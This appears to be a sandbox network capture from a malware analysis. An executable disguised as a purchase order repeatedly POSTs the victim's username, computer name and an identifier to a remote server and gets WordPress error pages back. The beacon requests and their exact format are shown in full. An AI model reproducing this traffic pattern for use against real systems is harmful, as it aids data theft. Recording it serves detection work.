Aug 29, 2024 12:04:34.819025040 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:33 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:34.819053888 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:34.819070101 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49762	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:34.965296030 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:34.970293999 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:37.279594898 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:35 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:37.279619932 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:37.279630899 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49763	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:37.436065912 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:37.441389084 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:39.676668882 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:39.676688910 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:39.676700115 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49764	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:39.826894999 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:39.833420992 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:42.108746052 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:42.108766079 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:42.108783007 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49765	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:42.262300968 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:42.267991066 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:44.657943964 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:42 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:44.658031940 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:44.658044100 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:44.658056021 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49766	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:44.813699961 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:44.823781967 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:47.124341011 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:47.124361038 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
